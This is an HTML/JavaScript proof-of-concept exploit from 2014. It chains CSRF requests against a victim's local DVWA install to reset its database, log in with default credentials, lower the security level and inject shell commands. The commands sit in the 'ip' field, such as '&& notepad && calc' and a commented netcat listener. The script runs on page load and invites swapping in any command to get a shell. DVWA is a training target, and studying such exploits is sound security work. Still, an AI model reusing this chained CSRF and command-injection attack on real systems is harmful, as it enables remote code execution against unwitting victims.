DVWA Command Execution Via CSRF Exploit

1. <!-- There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to
2.     first reset the DVWA database of victim, then make the victim log in using the default resets,
3.     next crafts another CSRF to change the challenge level to low to make exploitation more probable,
4.     then use these to craft a command execution CSRF and possibly get a shell. :)
5.    
6.     *This PoC will open calculator as a demo execution in approximately 5 seconds.*
7.    
8.     The attacker just needs to know you have DVWA for this to work.
9.    
10.     Paulos Yibelo and Tabor N. Shiferaw  2014
11.    
12.     -->
13.    
14.     <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'>
15.     </script>
16.     <div id='loader'></div>
17.    
18.     <Script>
19.  
20.     //document.getElementById("loader").innerHTML = 'Loading...';
21.    
22.     var one = {"create_db":'whatever'};
23.     var two = {"username":"admin","password":"password","Login":"Login"};
24.     var three = {"security":"low","seclev_submit":"Submit"};
25.    
26.     //windows opens calculator; change this to whatever your desire
27.     var four = {"ip":"127.0.0.1 && notepad && calc","submit":"submit"};
28.    
29.     //linux
30.     //var four = {"ip":"127.0.0.1;netcat -l 15.11.11.x -p 4444","submit":"submit"};
31.    
32.     /*
33.     *step 1
34.     *Reset the Databse
35.     */
36.     function start_exploit()
37.     {
38.         $("#loader").html("Loading...");
39.         $.ajax({
40.             url:"http://localhost/dvwa/setup.php",
41.             type:"POST",
42.             data:one,
43.             success:
44.                     function(x){
45.                         dvwaLogin();
46.                     }
47.            
48.         });
49.     }
50.     /*
51.     *step 2
52.     *login using default new password
53.     */
54.     function dvwaLogin()
55.     {
56.         $.ajax({
57.             url:"http://localhost/dvwa/login.php",
58.             type:"POST",
59.             data:two,
60.             success:function(x){
61.                 levelChanger();
62.             }
63.         });
64.     }
65.     /*
66.     *step 3
67.     *set level to low
68.     */
69.     function levelChanger(){
70.         $.ajax({
71.             url:"http://localhost/dvwa/security.php",
72.             type:"POST",
73.             data:three,
74.             success:function(x){
75.                 commandExecution();
76.             }
77.         });
78.     }
79.    
80.     /*
81.     *step 4
82.     *execute command
83.     */
84.     function commandExecution(){
85.         $.ajax(
86.                 {
87.                     url:"http://localhost/dvwa/vulnerabilities/exec/index.php",
88.                     type:"POST",
89.                     data:four,
90.                     success:function(x){
91.                         //document.getElementById("loader").innerHTML = "Executed";
92.                         $("#loader").text("Loaded");
93.                     }
94.                 }
95.             );
96.     }
97.    
98.    
99.     start_exploit();
100.     </script>
101.    
102. <!-- check out http://paulosyibelo.blogspot.com/2014/09/dvwa-unintended-security-issues.html for more -->